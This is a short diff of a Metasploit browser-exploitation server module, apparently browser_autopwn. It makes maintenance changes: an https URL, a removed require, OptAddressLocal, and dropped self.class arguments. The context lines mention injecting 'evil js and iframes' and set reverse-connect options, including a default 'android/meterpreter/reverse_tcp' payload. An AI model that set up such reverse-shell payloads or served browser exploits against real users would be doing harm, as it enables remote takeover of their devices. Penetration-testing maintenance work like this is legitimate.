@@ -1,5 +1,5 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
@@ -8,12 +8,10 @@
 #   insert all of the evil js and iframes into
 # - caching is busted when different browsers come from the same IP
 
-require 'msf/core'
 require 'rex/exploitation/js/detect'
 require 'rex/exploitation/jsobfu'
 
 class MetasploitModule < Msf::Auxiliary
-
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
@@ -61,10 +59,10 @@ class MetasploitModule < Msf::Auxiliary
       'DefaultAction'  => 'WebServer'))
 
     register_options([
-      OptAddress.new('LHOST', [true,
+      OptAddressLocal.new('LHOST', [true,
         'The IP address to use for reverse-connect payloads'
       ])
-    ], self.class)
+    ])
 
     register_advanced_options([
       OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
@@ -121,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
         'The payload to use for Android reverse-connect payloads',
         'android/meterpreter/reverse_tcp'
       ])
-    ], self.class)
+    ])
 
     @exploits = Hash.new
     @payloads = Hash.new
@@ -1074,5 +1072,4 @@ class MetasploitModule < Msf::Auxiliary
     end
     super
   end
-
 end
